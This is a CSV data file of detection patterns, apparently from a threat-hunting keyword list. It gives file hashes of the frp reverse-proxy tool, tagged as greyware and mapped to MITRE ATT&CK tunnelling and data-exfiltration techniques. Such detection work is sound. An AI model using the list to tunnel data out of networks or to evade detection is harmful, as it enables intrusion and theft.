"*8b0067e658dcbb21313ae8192aa7e1d364af8e96aeb7893ba7422ea0844e8bd5*",".{0,1000}8b0067e658dcbb21313ae8192aa7e1d364af8e96aeb7893ba7422ea0844e8bd5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8b2aee9d9eabc6078ae8a4c718030be85a13464becdb99f97f635e75425eb63e*",".{0,1000}8b2aee9d9eabc6078ae8a4c718030be85a13464becdb99f97f635e75425eb63e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8c47d8f1ad960d0f0459bd0fae7bc33c9266943d04549145b969c9107c59703f*",".{0,1000}8c47d8f1ad960d0f0459bd0fae7bc33c9266943d04549145b969c9107c59703f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8e05baa844d928b6239bd9f43cd3e065fc2af971930bc6344e2c899d7eea14db*",".{0,1000}8e05baa844d928b6239bd9f43cd3e065fc2af971930bc6344e2c899d7eea14db.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8ecf30ac7c14f85da20c1761c6418979282bff12db4d82ade2f4a1a8037bdf6e*",".{0,1000}8ecf30ac7c14f85da20c1761c6418979282bff12db4d82ade2f4a1a8037bdf6e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9033c6def481bde4bf7f2361966ae0ea92dfda5763a167460dcf0e231a2d02b8*",".{0,1000}9033c6def481bde4bf7f2361966ae0ea92dfda5763a167460dcf0e231a2d02b8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*91b1b306c1a538dd6d60857a1da9019241034bcaf0cc19e0c07abfaa8f6a8f75*",".{0,1000}91b1b306c1a538dd6d60857a1da9019241034bcaf0cc19e0c07abfaa8f6a8f75.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*91f46654fd8eae9fcc5a7189c6629a7e4b8f49654d996bbb45432cb4a46ac8f7*",".{0,1000}91f46654fd8eae9fcc5a7189c6629a7e4b8f49654d996bbb45432cb4a46ac8f7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9299c297f6c75c6aa2bbbb5de27172e367328b6f5bbb6f8d1c4ca73c4c4af415*",".{0,1000}9299c297f6c75c6aa2bbbb5de27172e367328b6f5bbb6f8d1c4ca73c4c4af415.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*93afeb34c835796508383b70028216eb3d43b2bf63bb3f7493acd1ec533d588e*",".{0,1000}93afeb34c835796508383b70028216eb3d43b2bf63bb3f7493acd1ec533d588e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*94169b8d725d30bb0ddf19db73d18b99544dcc52521507419eb7fb42823ea8ac*",".{0,1000}94169b8d725d30bb0ddf19db73d18b99544dcc52521507419eb7fb42823ea8ac.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*94ac6a42a165d913b79a0dcfb2d55a686e81b776697580e113aecd8815607076*",".{0,1000}94ac6a42a165d913b79a0dcfb2d55a686e81b776697580e113aecd8815607076.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*94e608af6d6f96619de403bf3aed4db8ab602999e0335380279e0d8aca1c6040*",".{0,1000}94e608af6d6f96619de403bf3aed4db8ab602999e0335380279e0d8aca1c6040.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*954903a1202b2a256a526839733dd2c3e676b58e68817aec11fd60743dab57ee*",".{0,1000}954903a1202b2a256a526839733dd2c3e676b58e68817aec11fd60743dab57ee.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*95583f7a979910ff4e65a5d9802df699063472a67a1f9e6d6fd6c2fcff448a14*",".{0,1000}95583f7a979910ff4e65a5d9802df699063472a67a1f9e6d6fd6c2fcff448a14.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*95c0695cdf0cd8d399cabdccdff93b25aa7deb97e950bd3702bbbaf9a2baf87a*",".{0,1000}95c0695cdf0cd8d399cabdccdff93b25aa7deb97e950bd3702bbbaf9a2baf87a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*95f0d8c8f4781fc8e42b7d644024c647032e3f6cd0ffe425e8f7d5a46d601557*",".{0,1000}95f0d8c8f4781fc8e42b7d644024c647032e3f6cd0ffe425e8f7d5a46d601557.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9704b24b5a58144293f7c7715b095b1ebf43b90e501050dfb9477094e6dca41b*",".{0,1000}9704b24b5a58144293f7c7715b095b1ebf43b90e501050dfb9477094e6dca41b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9774490a0a4f822960a8da99a214cec6e2320622c2c20cd6b713e0e52806031c*",".{0,1000}9774490a0a4f822960a8da99a214cec6e2320622c2c20cd6b713e0e52806031c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*97b4d3555734cba2af59b72b960ce10891b584dcf8d9e3db9f4f099c0a64131d*",".{0,1000}97b4d3555734cba2af59b72b960ce10891b584dcf8d9e3db9f4f099c0a64131d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*987f353f6ea282e259738eeb90c20b70fe20e1a49aca498b02acc47200c082bd*",".{0,1000}987f353f6ea282e259738eeb90c20b70fe20e1a49aca498b02acc47200c082bd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*98ab35f179091726b739c9fbb6643cc7328076bfbddd09732bb68b1cdf1b7435*",".{0,1000}98ab35f179091726b739c9fbb6643cc7328076bfbddd09732bb68b1cdf1b7435.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*99196195845422f6ac5962782fa3676f34fff343e0fed0f354cb6600d894afd8*",".{0,1000}99196195845422f6ac5962782fa3676f34fff343e0fed0f354cb6600d894afd8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9a12912bfbf7dad0ebe5fb3b0229b318a8670d078137f2384f81c1aa87bc0fb0*",".{0,1000}9a12912bfbf7dad0ebe5fb3b0229b318a8670d078137f2384f81c1aa87bc0fb0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9a56f4e3bf3a276c7be0b2f180a4d6ffbad1258dc09fe2d6637666dee9c840f6*",".{0,1000}9a56f4e3bf3a276c7be0b2f180a4d6ffbad1258dc09fe2d6637666dee9c840f6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9aab5a4936295d13f2602c8e087fd789a7910b3b3c9a47b9fb799ec99020192b*",".{0,1000}9aab5a4936295d13f2602c8e087fd789a7910b3b3c9a47b9fb799ec99020192b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9b3e4c64089c3b78ea1f666f11551e4ae6a435fc0797e39ab4fb07fd633b400c*",".{0,1000}9b3e4c64089c3b78ea1f666f11551e4ae6a435fc0797e39ab4fb07fd633b400c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9bc9e19e782030fdd219ef29607658de9b197adc9427cbc4517cb9884b7e7c07*",".{0,1000}9bc9e19e782030fdd219ef29607658de9b197adc9427cbc4517cb9884b7e7c07.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*9f27cec3b7e600c0223c0de06b65feafa9ed6bf82a8b1dfe338aef6b03bac097*",".{0,1000}9f27cec3b7e600c0223c0de06b65feafa9ed6bf82a8b1dfe338aef6b03bac097.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a003f5539bcf1c36e9d8f0565857dc8478015da4f97fa64bcb91f6495bbfc105*",".{0,1000}a003f5539bcf1c36e9d8f0565857dc8478015da4f97fa64bcb91f6495bbfc105.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a094d80528b9c413de86e56ff9e8617ff6b8855e8e95bc9c1826dea339033eba*",".{0,1000}a094d80528b9c413de86e56ff9e8617ff6b8855e8e95bc9c1826dea339033eba.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a148f12a5261ef3186322b08cf1b1907d987505ec5485adb290a350bb2083f63*",".{0,1000}a148f12a5261ef3186322b08cf1b1907d987505ec5485adb290a350bb2083f63.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a249c503a622599ba68330f323de22a457e058157cb8e38cd3e59581993c03d2*",".{0,1000}a249c503a622599ba68330f323de22a457e058157cb8e38cd3e59581993c03d2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a2a4ca5c8cbd085efefb71b5ff652d12425d6b16cdd3f22426c0a6f32d109942*",".{0,1000}a2a4ca5c8cbd085efefb71b5ff652d12425d6b16cdd3f22426c0a6f32d109942.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a343c8f23ba35c943e1c9311df17eb12f84c682d2ba0e965e244a49759b65f28*",".{0,1000}a343c8f23ba35c943e1c9311df17eb12f84c682d2ba0e965e244a49759b65f28.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a3f01a59bca7cb330bf680019595bbbf5f8167494fab4c46eaaf836fdc3a1902*",".{0,1000}a3f01a59bca7cb330bf680019595bbbf5f8167494fab4c46eaaf836fdc3a1902.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a41466714ba9463978139a62d241893a034425235b61ecf2efd868857e1c83b5*",".{0,1000}a41466714ba9463978139a62d241893a034425235b61ecf2efd868857e1c83b5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a41b7612e1057aff1743cdd0c9cf2dddd07f7e4e0340d419f05c42612b118a02*",".{0,1000}a41b7612e1057aff1743cdd0c9cf2dddd07f7e4e0340d419f05c42612b118a02.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a4623a06a0787afdbebf56aa1f406229d7457beb36c316e67ea90346e6921bb6*",".{0,1000}a4623a06a0787afdbebf56aa1f406229d7457beb36c316e67ea90346e6921bb6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a47d75d634790109eaa5768d4e5cb504988e3754dcfe458072ef0b46d9aea419*",".{0,1000}a47d75d634790109eaa5768d4e5cb504988e3754dcfe458072ef0b46d9aea419.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a4c1317ecb23efbf995cdf4b05c514fcd005d08ea50284e7c5b50f2ae312d88d*",".{0,1000}a4c1317ecb23efbf995cdf4b05c514fcd005d08ea50284e7c5b50f2ae312d88d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a4e37ca2c83f78a36945b82a7779749ecbf9661e9e6e4e881ab6d41666e1f669*",".{0,1000}a4e37ca2c83f78a36945b82a7779749ecbf9661e9e6e4e881ab6d41666e1f669.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a5496a0364e4e071aa6a1cbcfd519e35ac8dcb4eac9a24e6a22340c4d4cf1914*",".{0,1000}a5496a0364e4e071aa6a1cbcfd519e35ac8dcb4eac9a24e6a22340c4d4cf1914.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a5656349a6b98aba519b6222ad470fdb2a95903ae5ebf0b90819c441cd8dba8b*",".{0,1000}a5656349a6b98aba519b6222ad470fdb2a95903ae5ebf0b90819c441cd8dba8b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a660a94c158cb280974447efd174d3525d806ac7235f6546abeb1a57660a1125*",".{0,1000}a660a94c158cb280974447efd174d3525d806ac7235f6546abeb1a57660a1125.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a7626329b690c269d640555033e156a55cffb967f11556eb782ff130d0ad7982*",".{0,1000}a7626329b690c269d640555033e156a55cffb967f11556eb782ff130d0ad7982.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a77d3fa9419c5dc12ebd94eb5b97be3cff2c12b00dbe3884adc9ffcedf73909e*",".{0,1000}a77d3fa9419c5dc12ebd94eb5b97be3cff2c12b00dbe3884adc9ffcedf73909e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*a792cd515589050d475a28b714276a2960ed7ef8e0e5baeea3d38301a775fbb4*",".{0,1000}a792cd515589050d475a28b714276a2960ed7ef8e0e5baeea3d38301a775fbb4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*acd9f040fc6fb2a595f20bfb4faa66d9244615a0feaf9d2e4b03a994ca126a32*",".{0,1000}acd9f040fc6fb2a595f20bfb4faa66d9244615a0feaf9d2e4b03a994ca126a32.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ad151125bd46fb8abf11f2a4347c7c85e102bb0e6128c69962c8d6bf9a71fca6*",".{0,1000}ad151125bd46fb8abf11f2a4347c7c85e102bb0e6128c69962c8d6bf9a71fca6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ad61f4285ae98dd4b8bad622888e97bb290e2ca667cd9ad52ad2877cc2ec6807*",".{0,1000}ad61f4285ae98dd4b8bad622888e97bb290e2ca667cd9ad52ad2877cc2ec6807.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ad977caa79c00c082206f46f521b8f99a44a051425dbb69ec9da1a152aac6279*",".{0,1000}ad977caa79c00c082206f46f521b8f99a44a051425dbb69ec9da1a152aac6279.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*adbfe65938517a8024565569825526643eac2d3294f4524d12a2846611107e08*",".{0,1000}adbfe65938517a8024565569825526643eac2d3294f4524d12a2846611107e08.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*aff5412e89e7164b5083909f2b5a81d8edaa644a3bb6ef696843a6ee0d129fc3*",".{0,1000}aff5412e89e7164b5083909f2b5a81d8edaa644a3bb6ef696843a6ee0d129fc3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b09684adfae58733bc12cd0ee3cf1e20d6b888c3e5280cf9f9e7a6467cf87a71*",".{0,1000}b09684adfae58733bc12cd0ee3cf1e20d6b888c3e5280cf9f9e7a6467cf87a71.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b09d38e5eba230a6bb04f144f5d32d26ce69f1424bbbb1058d43c712ff558679*",".{0,1000}b09d38e5eba230a6bb04f144f5d32d26ce69f1424bbbb1058d43c712ff558679.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b117ea60954ad0c8d4e92eb60ca8e748806978506c377d59b4f5bc5295c4e3d1*",".{0,1000}b117ea60954ad0c8d4e92eb60ca8e748806978506c377d59b4f5bc5295c4e3d1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
